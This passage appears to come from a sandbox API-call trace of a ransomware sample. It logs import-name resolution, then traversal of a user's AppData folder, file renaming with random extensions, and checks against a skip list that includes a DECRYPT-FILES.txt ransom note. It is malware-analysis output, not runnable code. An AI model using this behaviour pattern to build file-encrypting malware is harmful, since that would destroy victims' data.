(lpString="CREATEPROCESSASUSERW") returned 20 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0184.618] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0184.618] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0184.618] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0184.618] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0184.618] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0184.618] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0184.618] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0184.618] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0184.618] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0184.618] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0184.618] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0184.618] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0184.618] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0184.619] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0184.619] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0184.619] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0184.619] lstrlenA (lpString="CREATETHREAD") returned 12 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0184.619] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0184.619] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0184.619] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0184.619] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0184.619] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0184.619] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0184.619] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0184.619] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0184.619] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0184.619] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0184.619] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0184.619] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0184.620] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0184.620] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0184.620] lstrlenA (lpString="CTRLROUTINE") returned 11 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0184.620] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0184.620] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0184.620] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0184.620] lstrlenA (lpString="DEBUGBREAK") returned 10 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0184.620] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0184.620] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0184.620] lstrlenA (lpString="DECODEPOINTER") returned 13 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0184.620] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0184.620] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0184.620] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0184.620] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0184.620] lstrlenA (lpString="DELETEATOM") returned 10 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0184.620] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0184.620] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0184.620] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0184.621] lstrlenA (lpString="DELETEFIBER") returned 11 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0184.621] lstrlenA (lpString="DELETEFILEA") returned 11 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0184.621] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0184.621] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0184.621] lstrlenA (lpString="DELETEFILEW") returned 11 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0184.621] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0184.621] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0184.621] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0184.621] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0184.621] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0184.621] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0184.621] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0184.621] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0184.621] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0184.621] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0184.621] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0184.621] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0184.621] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0184.621] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0184.621] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0184.622] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0184.622] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0184.622] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0184.622] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0184.622] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0184.622] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0184.622] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0184.622] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0184.622] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0184.622] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0184.622] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0184.622] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0184.622] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0184.622] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0184.622] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0184.622] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0184.622] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0184.622] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0184.622] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0184.623] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0184.623] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0184.623] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0184.623] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0184.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK") returned 79 [0184.623] wsprintfW (in: param_1=0x36fdd64, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK.qzTUi") returned 85 [0184.623] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.axnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.AXnK.qzTUi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.axnk.qztui"), dwFlags=0x0) returned 1 [0184.624] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.624] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.624] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.624] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb26740e0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb26740e0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xad381b60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x177, dwReserved0=0x0, dwReserved1=0x0, cFileName="profiles.ini.AXnK", cAlternateFileName="PROFIL~1.AXN")) returned 0 [0184.624] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0184.624] CloseHandle (hObject=0x26c) returned 1 [0184.625] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad3a7cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad3a7cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Firefox\\", cAlternateFileName="")) returned 0 [0184.625] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0184.625] CloseHandle (hObject=0x264) returned 1 [0184.625] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6416bc0, ftCreationTime.dwHighDateTime=0x1d4c893, ftLastAccessTime.dwLowDateTime=0x7bcf2b80, ftLastAccessTime.dwHighDateTime=0x1d4d558, ftLastWriteTime.dwLowDateTime=0xad3cde20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14bd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="MW_4G5Sx P7wGze.gif.RsVsF", cAlternateFileName="MW_4G5~1.RSV")) returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="DECRYPT-FILES.txt") returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="autorun.inf") returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="boot.ini") returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="desktop.ini") returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="ntuser.dat") returned -1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="iconcache.db") returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="bootsect.bak") returned 1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="ntuser.dat.log") returned -1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="thumbs.db") returned -1 [0184.626] lstrcmpiW (lpString1="MW_4G5Sx P7wGze.gif.RsVsF", lpString2="Bootfont.bin") returned 1 [0184.626] lstrlenW (lpString="MW_4G5Sx P7wGze.gif.RsVsF") returned 25 [0184.626] lstrcmpiW (lpString1="RsVsF", lpString2="lnk") returned 1 [0184.627] lstrcmpiW (lpString1="RsVsF", lpString2="exe") returned 1 [0184.627] lstrcmpiW (lpString1="RsVsF", lpString2="sys") returned -1 [0184.627] lstrcmpiW (lpString1="RsVsF", lpString2="dll") returned 1 [0184.627] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.627] lstrlenW (lpString="MW_4G5Sx P7wGze.gif.RsVsF") returned 25 [0184.627] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.627] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="MW_4G5Sx P7wGze.gif.RsVsF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif.RsVsF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif.RsVsF" [0184.627] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MW_4G5Sx P7wGze.gif.RsVsF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mw_4g5sx p7wgze.gif.rsvsf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.628] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=84951) returned 1 [0184.628] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.628] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.629] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.629] CloseHandle (hObject=0x268) returned 1 [0184.629] CloseHandle (hObject=0x264) returned 1 [0184.629] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.629] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc251ab50, ftCreationTime.dwHighDateTime=0x1d4c82e, ftLastAccessTime.dwLowDateTime=0x5e5d79e0, ftLastAccessTime.dwHighDateTime=0x1d4d05c, ftLastWriteTime.dwLowDateTime=0xad3f3f80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xeb4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NdoDnsxj.bmp.MU3tDg", cAlternateFileName="NDODNS~1.MU3")) returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="DECRYPT-FILES.txt") returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="autorun.inf") returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="boot.ini") returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="desktop.ini") returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="ntuser.dat") returned -1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="iconcache.db") returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="bootsect.bak") returned 1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="ntuser.dat.log") returned -1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="thumbs.db") returned -1 [0184.629] lstrcmpiW (lpString1="NdoDnsxj.bmp.MU3tDg", lpString2="Bootfont.bin") returned 1 [0184.630] lstrlenW (lpString="NdoDnsxj.bmp.MU3tDg") returned 19 [0184.630] lstrcmpiW (lpString1="MU3tDg", lpString2="lnk") returned 1 [0184.630] lstrcmpiW (lpString1="MU3tDg", lpString2="exe") returned 1 [0184.630] lstrcmpiW (lpString1="MU3tDg", lpString2="sys") returned -1 [0184.630] lstrcmpiW (lpString1="MU3tDg", 